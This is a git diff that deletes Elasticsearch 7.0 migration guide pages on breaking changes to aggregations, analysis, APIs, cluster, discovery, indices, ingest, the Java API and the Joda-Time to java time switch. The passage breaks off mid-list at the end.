-include::migrate_7_0/cluster.asciidoc[] -include::migrate_7_0/discovery.asciidoc[] -include::migrate_7_0/ingest.asciidoc[] -include::migrate_7_0/indices.asciidoc[] -include::migrate_7_0/mappings.asciidoc[] -include::migrate_7_0/ml.asciidoc[] -include::migrate_7_0/search.asciidoc[] -include::migrate_7_0/suggesters.asciidoc[] -include::migrate_7_0/packaging.asciidoc[] -include::migrate_7_0/plugins.asciidoc[] -include::migrate_7_0/api.asciidoc[] -include::migrate_7_0/java.asciidoc[] -include::migrate_7_0/settings.asciidoc[] -include::migrate_7_0/scripting.asciidoc[] -include::migrate_7_0/snapshotstats.asciidoc[] -include::migrate_7_0/restclient.asciidoc[] -include::migrate_7_0/low_level_restclient.asciidoc[] -include::migrate_7_0/logging.asciidoc[] -include::migrate_7_0/node.asciidoc[] -include::migrate_7_0/java_time.asciidoc[] diff --git a/docs/reference/migration/migrate_7_0/aggregations.asciidoc b/docs/reference/migration/migrate_7_0/aggregations.asciidoc deleted file mode 100644 index f0e7a78302a..00000000000 --- a/docs/reference/migration/migrate_7_0/aggregations.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[discrete] -[[breaking_70_aggregations_changes]] -=== Aggregations changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - - -[discrete] -[[removed-global-ordinals-hash-and-global-ordinals-low-cardinality-terms-agg]] -==== Deprecated `global_ordinals_hash` and `global_ordinals_low_cardinality` execution hints for terms aggregations have been removed - -These `execution_hint` are removed and should be replaced by `global_ordinals`. - -[discrete] -[[search-max-buckets-cluster-setting]] -==== `search.max_buckets` in the cluster setting - -The dynamic cluster setting named `search.max_buckets` now defaults -to 10,000 (instead of unlimited in the previous version). -Requests that try to return more than the limit will fail with an exception. - -[discrete] -[[missing-option-removed-composite-agg]] -==== `missing` option of the `composite` aggregation has been removed - -The `missing` option of the `composite` aggregation, deprecated in 6.x, -has been removed. `missing_bucket` should be used instead. - -[discrete] -[[replace-params-agg-with-state-context-variable]] -==== Replaced `params._agg` with `state` context variable in scripted metric aggregations - -The object used to share aggregation state between the scripts in a Scripted Metric -Aggregation is now a variable called `state` available in the script context, rather than -being provided via the `params` object as `params._agg`. - -[discrete] -[[reduce-script-combine-script-params-mandatory]] -==== Make metric aggregation script parameters `reduce_script` and `combine_script` mandatory - -The metric aggregation has been changed to require these two script parameters to ensure users are -explicitly defining how their data is processed. - -[discrete] -[[percentiles-percentile-ranks-return-null-instead-nan]] -==== `percentiles` and `percentile_ranks` now return `null` instead of `NaN` - -The `percentiles` and `percentile_ranks` aggregations used to return `NaN` in -the response if they were applied to an empty set of values. Because `NaN` is -not officially supported by JSON, it has been replaced with `null`. - -[discrete] -[[stats-extended-stats-return-zero-instead-null]] -==== `stats` and `extended_stats` now return 0 instead of `null` for zero docs - -When the `stats` and `extended_stats` aggregations collected zero docs (`doc_count: 0`), -their value would be `null`. This was in contrast with the `sum` aggregation which -would return `0`. The `stats` and `extended_stats` aggs are now consistent with -`sum` and also return zero. diff --git a/docs/reference/migration/migrate_7_0/analysis.asciidoc b/docs/reference/migration/migrate_7_0/analysis.asciidoc deleted file mode 100644 index 7c5e4901b6e..00000000000 --- a/docs/reference/migration/migrate_7_0/analysis.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[discrete] -[[breaking_70_analysis_changes]] -=== Analysis changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[limit-number-of-tokens-produced-by-analyze]] -==== Limiting the number of tokens produced by _analyze - -To safeguard against out of memory errors, the number of tokens that can be produced -using the `_analyze` endpoint has been limited to 10000. This default limit can be changed -for a particular index with the index setting `index.analyze.max_token_count`. - -[discrete] -==== Limiting the length of an analyzed text during highlighting - -Highlighting a text that was indexed without offsets or term vectors, -requires analysis of this text in memory real time during the search request. -For large texts this analysis may take substantial amount of time and memory. -To protect against this, the maximum number of characters that will be analyzed has been -limited to 1000000. This default limit can be changed -for a particular index with the index setting `index.highlight.max_analyzed_offset`. - -[discrete] -[[delimited-payload-filter-renaming]] -==== `delimited_payload_filter` renaming - -The `delimited_payload_filter` was deprecated and renamed to `delimited_payload` in 6.2. -Using it in indices created before 7.0 will issue deprecation warnings. Using the old -name in new indices created in 7.0 will throw an error. Use the new name `delimited_payload` -instead. - -[discrete] -[[standard-filter-removed]] -==== `standard` filter has been removed - -The `standard` token filter has been removed because it doesn't change anything in the stream. - -[discrete] -==== Deprecated standard_html_strip analyzer - -The `standard_html_strip` analyzer has been deprecated, and should be replaced -with a combination of the `standard` tokenizer and `html_strip` char_filter. -Indexes created using this analyzer will still be readable in elasticsearch 7.0, -but it will not be possible to create new indexes using it. - -[discrete] -[[deprecated-ngram-edgengram-token-filter-cannot-be-used]] -==== The deprecated `nGram` and `edgeNGram` token filter cannot be used on new indices - -The `nGram` and `edgeNGram` token filter names have been deprecated in an earlier 6.x version. -Indexes created using these token filters will still be readable in elasticsearch 7.0 but indexing -documents using those filter names will issue a deprecation warning. Using the deprecated names on -new indices starting with version 7.0.0 will be prohibited and throw an error when indexing -or analyzing documents. Both names should be replaced by `ngram` or `edge_ngram` respectively. - -[discrete] -==== Limit to the difference between max_size and min_size in NGramTokenFilter and NGramTokenizer - -To safeguard against creating too many index terms, the difference between `max_ngram` and -`min_ngram` in `NGramTokenFilter` and `NGramTokenizer` has been limited to 1. This default -limit can be changed with the index setting `index.max_ngram_diff`. Note that if the limit is -exceeded a error is thrown only for new indices. For existing pre-7.0 indices, a deprecation -warning is logged. - -[discrete] -==== Limit to the difference between max_shingle_size and min_shingle_size in ShingleTokenFilter - -To safeguard against creating too many tokens, the difference between `max_shingle_size` and -`min_shingle_size` in `ShingleTokenFilter` has been limited to 3. This default -limit can be changed with the index setting `index.max_shingle_diff`. Note that if the limit is -exceeded a error is thrown only for new indices. For existing pre-7.0 indices, a deprecation -warning is logged. diff --git a/docs/reference/migration/migrate_7_0/api.asciidoc b/docs/reference/migration/migrate_7_0/api.asciidoc deleted file mode 100644 index d110f7882c1..00000000000 --- a/docs/reference/migration/migrate_7_0/api.asciidoc +++ /dev/null @@ -1,303 +0,0 @@ -[discrete] -[[breaking_70_api_changes]] -=== API changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - - -[discrete] -==== Internal Versioning is no longer supported for optimistic concurrency control - -Elasticsearch maintains a numeric version field for each document it stores. That field -is incremented by one with every change to the document. Until 7.0.0 the API allowed using -that field for optimistic concurrency control, i.e., making a write operation conditional -on the current document version. Sadly, that approach is flawed because the value of the -version doesn't always uniquely represent a change to the document. If a primary fails -while handling a write operation, it may expose a version that will then be reused by the -new primary. - -Due to that issue, internal versioning can no longer be used and is replaced by a new -method based on <>. To switch -to the new method, follow these steps: - -. Perform a <> to 6.8. - -. <> any indices created before 6.0. This ensures -documents in those indices have sequence numbers. -+ -To get the {es} version in which an index was created, use the -<> with the `human` parameter: -+ --- -.*API Example* -[%collapsible] -==== -[source,console] ----- -GET /*?human ----- -// TEST[setup:my_index] - -The response returns a `settings.index.version.created_string` property for -each index: - -[source,console-response] ----- -{ - "my-index-000001": { - ... - "settings": { - "index": { - "creation_date_string": "2099-01-01T00:00:00.000Z", - "routing": { - "allocation": { - "include": { - "_tier_preference": "data_content" - } - } - }, - "number_of_shards": "1", - "provided_name": "my-index-000001", - "creation_date": "4070908800", - "number_of_replicas": "1", - "uuid": "c89-MHh8RwKwS1r7Turg2g", - "version": { - "created_string": "5.5.0", <1> - "created": "5050099" - } - } - } - } -} ----- -// TESTRESPONSE[s/\.\.\./"aliases": $body.my-index-000001.aliases, "mappings": $body.my-index-000001.mappings,/] -// TESTRESPONSE[s/"creation_date_string": "2099-01-01T00:00:00.000Z"/"creation_date_string": $body.my-index-000001.settings.index.creation_date_string/] -// TESTRESPONSE[s/"creation_date": "4070908800"/"creation_date": $body.my-index-000001.settings.index.creation_date/] -// TESTRESPONSE[s/"uuid": "c89-MHh8RwKwS1r7Turg2g"/"uuid": $body.my-index-000001.settings.index.uuid/] -// TESTRESPONSE[s/"created_string": "5.5.0"/"created_string": $body.my-index-000001.settings.index.version.created_string/] -// TESTRESPONSE[s/"created": "5050099"/"created": $body.my-index-000001.settings.index.version.created/] - -<1> This index was created in {es} 5.5.0. -==== --- - -. Update your application or workflow to use -<> for concurrency control. - -. Perform a rolling upgrade to {version}. - -NOTE: The `external` versioning type is still fully supported. - -[discrete] -==== Camel case and underscore parameters deprecated in 6.x have been removed -A number of duplicate parameters deprecated in 6.x have been removed from -Bulk request, Multi Get request, Term Vectors request, and More Like This Query -requests. - -The following camel case parameters have been removed: - -* `opType` -* `versionType`, `_versionType` - -The following parameters starting with underscore have been removed: - -* `_parent` -* `_retry_on_conflict` -* `_routing` -* `_version` -* `_version_type` - -Instead of these removed parameters, use their non camel case equivalents without -starting underscore, e.g. use `version_type` instead of `_version_type` or `versionType`. - -[discrete] -==== Thread pool info - -In previous versions of Elasticsearch, the thread pool info returned in the -<> returned `min` and `max` values reflecting -the configured minimum and maximum number of threads that could be in each -thread pool. The trouble with this representation is that it does not align with -the configuration parameters used to configure thread pools. For -<>, the minimum number of threads is -configured by a parameter called `core` and the maximum number of threads is -configured by a parameter called `max`. For <>, there is only one configuration parameter along these lines and that -parameter is called `size`, reflecting the fixed number of threads in the -pool. This discrepancy between the API and the configuration parameters has been -rectified. Now, the API will report `core` and `max` for scaling thread pools, -and `size` for fixed thread pools. - -Similarly, in the cat thread pool API the existing `size` output has been -renamed to `pool_size` which reflects the number of threads currently in the -pool; the shortcut for this value has been changed from `s` to `psz`. The `min` -output has been renamed to `core` with a shortcut of `cr`, the shortcut for -`max` has been changed to `mx`, and the `size` output with a shortcut of `sz` -has been reused to report the configured number of threads in the pool. This -aligns the output of the API with the configuration values for thread -pools. Note that `core` and `max` will be populated for scaling thread pools, -and `size` will be populated for fixed thread pools. - -[discrete] -[[fields-param-removed-bulk-update-request]] -==== The parameter `fields` deprecated in 6.x has been removed from Bulk request -and Update request. The Update API returns `400 - Bad request` if request contains -unknown parameters (instead of ignored in the previous version). - -[discrete] -==== PUT Document with Version error message changed when document is missing - -If you attempt to `PUT` a document with versioning (e.g. `PUT /test/_doc/1?version=4`) -but the document does not exist, a cryptic message is returned: - -[source,text] ----------- -version conflict, current version [-1] is different than the one provided [4] ----------- - -Now if the document is missing a more helpful message is returned: - -[source,text] ----------- -document does not exist (expected version [4]) ----------- - -Although exceptions messages are liable to change and not generally subject to -backwards compatibility, the nature of this message might mean clients are relying -on parsing the version numbers and so the format change might impact some users. - -[discrete] -[[remove-suggest-metric]] -==== Remove support for `suggest` metric/index metric in indices stats and nodes stats APIs - -Previously, `suggest` stats were folded into `search` stats. Support for the -`suggest` metric on the indices stats and nodes stats APIs remained for -backwards compatibility. Backwards support for the `suggest` metric was -deprecated in 6.3.0 and now removed in 7.0.0. - -[discrete] -[[remove-field-caps-body]] -==== Field capabilities request format - -In the past, `fields` could be provided either as a parameter, or as part of the request -body. Specifying `fields` in the request body as opposed to a parameter was deprecated -in 6.4.0, and is now unsupported in 7.0.0. - -[discrete] -[[copy-settings-deprecated-shrink-split-apis]] -==== `copy_settings` is deprecated on shrink and split APIs - -Versions of Elasticsearch prior to 6.4.0 did not copy index settings on shrink -and split operations. Starting with Elasticsearch 7.0.0, the default behavior -will be for such settings to be copied on such operations. To enable users in -6.4.0 to transition in 6.4.0 to the default behavior in 7.0.0, the -`copy_settings` parameter was added on the REST layer. As this behavior will be -the only behavior in 8.0.0, this parameter is deprecated in 7.0.0 for removal in -8.0.0. - -[discrete] -==== The deprecated stored script contexts have now been removed -When putting stored scripts, support for storing them with the deprecated `template` context or without a context is -now removed. Scripts must be stored using the `script` context as mentioned in the documentation. - -[discrete] -==== Removed Get Aliases API limitations when {security-features} are enabled - -The behavior and response codes of the get aliases API no longer vary -depending on whether {security-features} are enabled. Previously a -404 - NOT FOUND (IndexNotFoundException) could be returned in case the -current user was not authorized for any alias. An empty response with -status 200 - OK is now returned instead at all times. - -[discrete] -[[user-object-removed-put-user-api]] -==== Put User API response no longer has `user` object - -The Put User API response was changed in 6.5.0 to add the `created` field -outside of the user object where it previously had been. In 7.0.0 the user -object has been removed in favor of the top level `created` field. - -[discrete] -[[source-include-exclude-params-removed]] -==== Source filtering url parameters `_source_include` and `_source_exclude` have been removed - -The deprecated in 6.x url parameters are now removed. Use `_source_includes` and `_source_excludes` instead. - -[discrete] -==== Multi Search Request metadata validation - -MultiSearchRequests issued through `_msearch` now validate all keys in the metadata section. Previously unknown keys were ignored -while now an exception is thrown. - -[discrete] -==== Deprecated graph endpoints removed - -The deprecated graph endpoints (those with `/_graph/_explore`) have been -removed. - - -[discrete] -[[deprecated-termvector-endpoint-removed]] -==== Deprecated `_termvector` endpoint removed - -The `_termvector` endpoint was deprecated in 2.0 and has now been removed. -The endpoint `_termvectors` (plural) should be used instead. - -[discrete] -==== When {security-features} are enabled, index monitoring APIs over restricted indices are not authorized implicitly anymore - -Restricted indices (currently only `.security-6` and `.security`) are special internal -indices that require setting the `allow_restricted_indices` flag on every index -permission that covers them. If this flag is `false` (default) the permission -will not cover these and actions against them will not be authorized. -However, the monitoring APIs were the only exception to this rule. This exception -has been forfeited and index monitoring privileges have to be granted explicitly, -using the `allow_restricted_indices` flag on the permission (as any other index -privilege). - -[discrete] -[[remove-get-support-cache-clear-api]] -==== Removed support for `GET` on the `_cache/clear` API - -The `_cache/clear` API no longer supports the `GET` HTTP verb. It must be called -with `POST`. - -[discrete] -==== Cluster state size metrics removed from Cluster State API Response - -The `compressed_size` / `compressed_size_in_bytes` fields were removed from -the Cluster State API response. The calculation of the size was expensive and had -dubious value, so the field was removed from the response. - -[discrete] -==== Migration Assistance API has been removed - -The Migration Assistance API has been functionally replaced by the -Deprecation Info API, and the Migration Upgrade API is not used for the -transition from ES 6.x to 7.x, and does not need to be kept around to -repair indices that were not properly upgraded before upgrading the -cluster, as was the case in 6. - -[discrete] -==== Changes to thread pool naming in Node and Cat APIs -The `thread_pool` information returned from the Nodes and Cat APIs has been -standardized to use the same terminology as the thread pool configurations. -This means the response will align with the configuration instead of being -the same across all the thread pools, regardless of type. - -[discrete] -==== Return 200 when cluster has valid read-only blocks -If the cluster was configured with `no_master_block: write` and lost its master, -it would return a `503` status code from a main request (`GET /`) even though -there are viable read-only nodes available. The cluster now returns 200 status -in this situation. - -[discrete] -==== Clearing indices cache is now POST-only -Clearing the cache indices could previously be done via GET and POST. As GET should -only support read only non state-changing operations, this is no longer allowed. -Only POST can be used to clear the cache. diff --git a/docs/reference/migration/migrate_7_0/cluster.asciidoc b/docs/reference/migration/migrate_7_0/cluster.asciidoc deleted file mode 100644 index fc0c636d7f8..00000000000 --- a/docs/reference/migration/migrate_7_0/cluster.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[discrete] -[[breaking_70_cluster_changes]] -=== Cluster changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[_literal_literal_is_no_longer_allowed_in_cluster_name]] -==== `:` is no longer allowed in cluster name - -Due to cross-cluster search using `:` to separate a cluster and index name, -cluster names may no longer contain `:`. - -[discrete] -[[new-default-wait-for-active-shards-param]] -==== New default for `wait_for_active_shards` parameter of the open index command - -The default value for the `wait_for_active_shards` parameter of the open index API -is changed from 0 to 1, which means that the command will now by default wait for all -primary shards of the opened index to be allocated. - -[discrete] -[[shard-preferences-removed]] -==== Shard preferences `_primary`, `_primary_first`, `_replica`, and `_replica_first` are removed -These shard preferences are removed in favour of the `_prefer_nodes` and `_only_nodes` preferences. - -[discrete] -==== Cluster-wide shard soft limit -Clusters now have soft limits on the total number of open shards in the cluster -based on the number of nodes and the `cluster.max_shards_per_node` cluster -setting, to prevent accidental operations that would destabilize the cluster. -More information can be found in the <>. diff --git a/docs/reference/migration/migrate_7_0/discovery.asciidoc b/docs/reference/migration/migrate_7_0/discovery.asciidoc deleted file mode 100644 index e6adec80fe8..00000000000 --- a/docs/reference/migration/migrate_7_0/discovery.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[discrete] -[[breaking_70_discovery_changes]] -=== Discovery changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Cluster bootstrapping is required if discovery is configured - -The first time a cluster is started, `cluster.initial_master_nodes` must be set -to perform cluster bootstrapping. It should contain the names of the -master-eligible nodes in the initial cluster and be defined on every -master-eligible node in the cluster. See <> for an example, and the -<> describes this setting in more detail. - -The `discovery.zen.minimum_master_nodes` setting is permitted, but ignored, on -7.x nodes. - -[discrete] -==== Removing master-eligible nodes sometimes requires voting exclusions - -If you wish to remove half or more of the master-eligible nodes from a cluster, -you must first exclude the affected nodes from the voting configuration using -the <>. -If you remove fewer than half of the master-eligible nodes at the same time, -voting exclusions are not required. If you remove only master-ineligible nodes -such as data-only nodes or coordinating-only nodes, voting exclusions are not -required. Likewise, if you add nodes to the cluster, voting exclusions are not -required. - -[discrete] -==== Discovery configuration is required in production - -Production deployments of Elasticsearch now require at least one of the -following settings to be specified in the `elasticsearch.yml` configuration -file: - -- `discovery.seed_hosts` -- `discovery.seed_providers` -- `cluster.initial_master_nodes` -- `discovery.zen.ping.unicast.hosts` -- `discovery.zen.hosts_provider` - -The first three settings in this list are only available in versions 7.0 and -above. If you are preparing to upgrade from an earlier version, you must set -`discovery.zen.ping.unicast.hosts` or `discovery.zen.hosts_provider`. - -[discrete] -[[new-name-no-master-block-setting]] -==== New name for `no_master_block` setting - -The `discovery.zen.no_master_block` setting is now known as -`cluster.no_master_block`. Any value set for `discovery.zen.no_master_block` is -now ignored. You should remove this setting and, if needed, set -`cluster.no_master_block` appropriately after the upgrade. - -[discrete] -==== Reduced default timeouts for fault detection - -By default the <> subsystem -now considers a node to be faulty if it fails to respond to 3 consecutive -pings, each of which times out after 10 seconds. Thus a node that is -unresponsive for longer than 30 seconds is liable to be removed from the -cluster. Previously the default timeout for each ping was 30 seconds, so that -an unresponsive node might be kept in the cluster for over 90 seconds. - -[discrete] -==== Master-ineligible nodes are ignored by discovery - -In earlier versions it was possible to use master-ineligible nodes during the -discovery process, either as seed nodes or to transfer discovery gossip -indirectly between the master-eligible nodes. Clusters that relied on -master-ineligible nodes like this were fragile and unable to automatically -recover from some kinds of failure. Discovery now involves only the -master-eligible nodes in the cluster so that it is not possible to rely on -master-ineligible nodes like this. You should configure -<> to provide the addresses of all the master-eligible nodes in -your cluster. diff --git a/docs/reference/migration/migrate_7_0/indices.asciidoc b/docs/reference/migration/migrate_7_0/indices.asciidoc deleted file mode 100644 index ca3f4989670..00000000000 --- a/docs/reference/migration/migrate_7_0/indices.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[discrete] -[[breaking_70_indices_changes]] -=== Indices changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Index creation no longer defaults to five shards -Previous versions of Elasticsearch defaulted to creating five shards per index. -Starting with 7.0.0, the default is now one shard per index. - -[discrete] -[[_literal_literal_is_no_longer_allowed_in_index_name]] -==== `:` is no longer allowed in index name - -Due to cross-cluster search using `:` to separate a cluster and index name, -index names may no longer contain `:`. - -[discrete] -[[index-unassigned-node-left-delayed-timeout-no-longer-negative]] -==== `index.unassigned.node_left.delayed_timeout` may no longer be negative - -Negative values were interpreted as zero in earlier versions but are no -longer accepted. - -[discrete] -[[flush-force-merge-no-longer-refresh]] -==== `_flush` and `_force_merge` will no longer refresh - -In previous versions issuing a `_flush` or `_force_merge` (with `flush=true`) -had the undocumented side-effect of refreshing the index which made new documents -visible to searches and non-realtime GET operations. From now on these operations -don't have this side-effect anymore. To make documents visible an explicit `_refresh` -call is needed unless the index is refreshed by the internal scheduler. - -[discrete] -==== Document distribution changes - -Indices created with version `7.0.0` onwards will have an automatic `index.number_of_routing_shards` -value set. This might change how documents are distributed across shards depending on how many -shards the index has. In order to maintain the exact same distribution as a pre `7.0.0` index, the -`index.number_of_routing_shards` must be set to the `index.number_of_shards` at index creation time. -Note: if the number of routing shards equals the number of shards `_split` operations are not supported. - -[discrete] -==== Skipped background refresh on search idle shards - -Shards belonging to an index that does not have an explicit -`index.refresh_interval` configured will no longer refresh in the background -once the shard becomes "search idle", ie the shard hasn't seen any search -traffic for `index.search.idle.after` seconds (defaults to `30s`). Searches -that access a search idle shard will be "parked" until the next refresh -happens. Indexing requests with `wait_for_refresh` will also trigger -a background refresh. - -[discrete] -==== Remove deprecated url parameters for Clear Indices Cache API - -The following previously deprecated url parameter have been removed: - -* `filter` - use `query` instead -* `filter_cache` - use `query` instead -* `request_cache` - use `request` instead -* `field_data` - use `fielddata` instead - -[discrete] -[[network-breaker-inflight-requests-overhead-increased-to-2]] -==== `network.breaker.inflight_requests.overhead` increased to 2 - -Previously the in flight requests circuit breaker considered only the raw byte representation. -By bumping the value of `network.breaker.inflight_requests.overhead` from 1 to 2, this circuit -breaker considers now also the memory overhead of representing the request as a structured object. - -[discrete] -==== Parent circuit breaker changes - -The parent circuit breaker defines a new setting `indices.breaker.total.use_real_memory` which is -`true` by default. This means that the parent circuit breaker will trip based on currently used -heap memory instead of only considering the reserved memory by child circuit breakers. When this -setting is `true`, the default parent breaker limit also changes from 70% to 95% of the JVM heap size. -The previous behavior can be restored by setting `indices.breaker.total.use_real_memory` to `false`. - -[discrete] -==== Field data circuit breaker changes -As doc values have been enabled by default in earlier versions of Elasticsearch, -there is less need for fielddata. Therefore, the default value of the setting -`indices.breaker.fielddata.limit` has been lowered from 60% to 40% of the JVM -heap size. - -[discrete] -[[fix-value-for-index-shard-check-on-startup-removed]] -==== `fix` value for `index.shard.check_on_startup` is removed - -Deprecated option value `fix` for setting `index.shard.check_on_startup` is not supported. - -[discrete] -[[elasticsearch-translog-removed]] -==== `elasticsearch-translog` is removed - -Use the `elasticsearch-shard` tool to remove corrupted translog data. diff --git a/docs/reference/migration/migrate_7_0/ingest.asciidoc b/docs/reference/migration/migrate_7_0/ingest.asciidoc deleted file mode 100644 index 9345ec2a2e1..00000000000 --- a/docs/reference/migration/migrate_7_0/ingest.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[discrete] -[[breaking_70_ingest_changes]] -=== API changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -[discrete] -==== Ingest configuration exception information is now transmitted in metadata field - -Previously, some ingest configuration exception information about ingest processors -was sent to the client in the HTTP headers, which is inconsistent with how -exceptions are conveyed in other parts of Elasticsearch. - -Configuration exception information is now conveyed as a field in the response -body. -//end::notable-breaking-changes[] -[discrete] -==== Ingest plugin special handling has been removed -There was some special handling for installing and removing the `ingest-geoip` and -`ingest-user-agent` plugins after they were converted to modules. This special handling -was done to minimize breaking users in a minor release, and would exit with a status code -zero to avoid breaking automation. - -This special handling has now been removed. diff --git a/docs/reference/migration/migrate_7_0/java.asciidoc b/docs/reference/migration/migrate_7_0/java.asciidoc deleted file mode 100644 index f01c0d428f6..00000000000 --- a/docs/reference/migration/migrate_7_0/java.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[discrete] -[[breaking_70_java_changes]] -=== Java API changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[isshardsacked-removed]] -==== `isShardsAcked` deprecated in `6.2` has been removed - -`isShardsAcked` has been replaced by `isShardsAcknowledged` in -`CreateIndexResponse`, `RolloverResponse` and -`CreateIndexClusterStateUpdateResponse`. - -[discrete] -[[prepareexecute-removed-client-api]] -==== `prepareExecute` removed from the client api - -The `prepareExecute` method which created a request builder has been -removed from the client api. Instead, construct a builder for the -appropriate request directly. - -[discrete] -==== Some Aggregation classes have moved packages - -* All classes present in `org.elasticsearch.search.aggregations.metrics.*` packages -were moved to a single `org.elasticsearch.search.aggregations.metrics` package. - -* All classes present in `org.elasticsearch.search.aggregations.pipeline.*` packages -were moved to a single `org.elasticsearch.search.aggregations.pipeline` package. In -addition, `org.elasticsearch.search.aggregations.pipeline.PipelineAggregationBuilders` -was moved to `org.elasticsearch.search.aggregations.PipelineAggregationBuilders` - - -[discrete] -[[retry-withbackoff-methods-removed]] -==== `Retry.withBackoff` methods with `Settings` removed - -The variants of `Retry.withBackoff` that included `Settings` have been removed -because `Settings` is no longer needed. - -[discrete] -[[client-termvector-removed]] -==== Deprecated method `Client#termVector` removed - -The client method `termVector`, deprecated in 2.0, has been removed. The method -`termVectors` (plural) should be used instead. - -[discrete] -[[abstractlifecyclecomponent-constructor-removed]] -==== Deprecated constructor `AbstractLifecycleComponent(Settings settings)` removed - -The constructor `AbstractLifecycleComponent(Settings settings)`, deprecated in 6.7 -has been removed. The parameterless constructor should be used instead. - -[discrete] -==== Changes to Geometry classes - -Geometry classes used to represent geo values in SQL have been moved from the -`org.elasticsearch.geo.geometry` package to the `org.elasticsearch.geometry` -package and the order of the constructor parameters has changed from `lat`, `lon` -to `lon`, `lat`. diff --git a/docs/reference/migration/migrate_7_0/java_time.asciidoc b/docs/reference/migration/migrate_7_0/java_time.asciidoc deleted file mode 100644 index 5968868a34e..00000000000 --- a/docs/reference/migration/migrate_7_0/java_time.asciidoc +++ /dev/null @@ -1,135 +0,0 @@ -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[breaking_70_java_time_changes]] -=== Replacing Joda-Time with java time - -Since Java 8 there is a dedicated `java.time` package, which is superior to -the Joda-Time library, that has been used so far in Elasticsearch. One of -the biggest advantages is the ability to be able to store dates in a higher -resolution than milliseconds for greater precision. Also this will allow us -to remove the Joda-Time dependency in the future. - -The mappings, aggregations and search code switched from Joda-Time to -java time. - -[discrete] -==== Joda based date formatters are replaced with java ones - -With the release of Elasticsearch 6.7 a backwards compatibility layer was -introduced, that checked if you are using a Joda-Time based formatter, that is -supported differently in java time. A log message was emitted, and you could -create the proper java time based formatter prefixed with an `8`. - -With Elasticsearch 7.0 all formatters are now java based, which means you will -get exceptions when using deprecated formatters without checking the -deprecation log in 6.7. In the worst case you may even end up with different -dates. - -An example deprecation message looks like this, that is returned, when you -try to use a date formatter that includes a lower case `Y` - -[source,text] ----------- -Use of 'Y' (year-of-era) will change to 'y' in the next major version of -Elasticsearch. Prefix your date format with '8' to use the new specifier. ----------- - -So, instead of using `YYYY.MM.dd` you should use `8yyyy.MM.dd`. - -You can find more information about available formatting strings in the -https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html[DateTimeFormatter javadocs]. - -[discrete] -==== Date formats behavioural change - -The `epoch_millis` and `epoch_second` formatters no longer support -scientific notation. - -If you are using the century of era formatter in a date (`C`), this will no -longer be supported. - -The year-of-era formatting character is a `Y` in Joda-Time, but a lowercase -`y` in java time. - -The week-based-year formatting character is a lowercase `x` in Joda-Time, -but an upper-case `Y` in java time. - -[discrete] -==== Using time zones in the Java client - -Timezones have to be specified as java time based zone objects. This means, -instead of using a `org.joda.time.DateTimeZone` the use of -`java.time.ZoneId` is required. - -Examples of possible uses are the `QueryStringQueryBuilder`, the -`RangeQueryBuilder` or the `DateHistogramAggregationBuilder`, each of them -allow for an optional timezone for that part of the search request. - -[discrete] -==== Parsing aggregation buckets in the Java client - -The date based aggregation buckets in responses used to be of -type `JodaTime`. Due to migrating to java-time, the buckets are now of -type `ZonedDateTime`. As the client is returning untyped objects here, you -may run into class cast exceptions only when running the code, but not at -compile time, ensure you have proper test coverage for this in your -own code. - -[discrete] -[[parsing-gtm0-timezeone-jdk8-not-supported]] -==== Parsing `GMT0` timezone with JDK8 is not supported - -When you are running Elasticsearch 7 with Java 8, you are not able to parse -the timezone `GMT0` properly anymore. The reason for this is a bug in the -JDK, which has not been fixed for JDK8. You can read more in the -https://bugs.openjdk.java.net/browse/JDK-8138664[official issue] -This bug is fixed in JDK9 and later versions. - -[discrete] -==== Scripting with dates should use java time based methods - -If dates are used in scripting, a backwards compatibility layer has been added -that emulates the Joda-Time methods, but logs a deprecation message as well -to use the java time methods. - -The following methods will be removed in future versions of Elasticsearch -and should be replaced. - -* `getDayOfWeek()` will be an enum instead of an int, if you need to use - an int, use `getDayOfWeekEnum().getValue()` -* `getMillis()` should be replaced with `toInstant().toEpochMilli()` -* `getCenturyOfEra()` should be replaced with `get(ChronoField.YEAR_OF_ERA) / 100` -* `getEra()` should be replaced with `get(ChronoField.ERA)` -* `getHourOfDay()` should be replaced with `getHour()` -* `getMillisOfDay()` should be replaced with `get(ChronoField.MILLI_OF_DAY)` -* `getMillisOfSecond()` should be replaced with `get(ChronoField.MILLI_OF_SECOND)` -* `getMinuteOfDay()` should be replaced with `get(ChronoField.MINUTE_OF_DAY)` -* `getMinuteOfHour()` should be replaced with `getMinute()` -* `getMonthOfYear()` should be replaced with `getMonthValue()` -* `getSecondOfDay()` should be replaced with `get(ChronoField.SECOND_OF_DAY)` -* `getSecondOfMinute()` should be replaced with `getSecond()` -* `getWeekOfWeekyear()` should be replaced with `get(WeekFields.ISO.weekOfWeekBasedYear())` -* `getWeekyear()` should be replaced with `get(WeekFields.ISO.weekBasedYear())` -* `getYearOfCentury()` should be replaced with 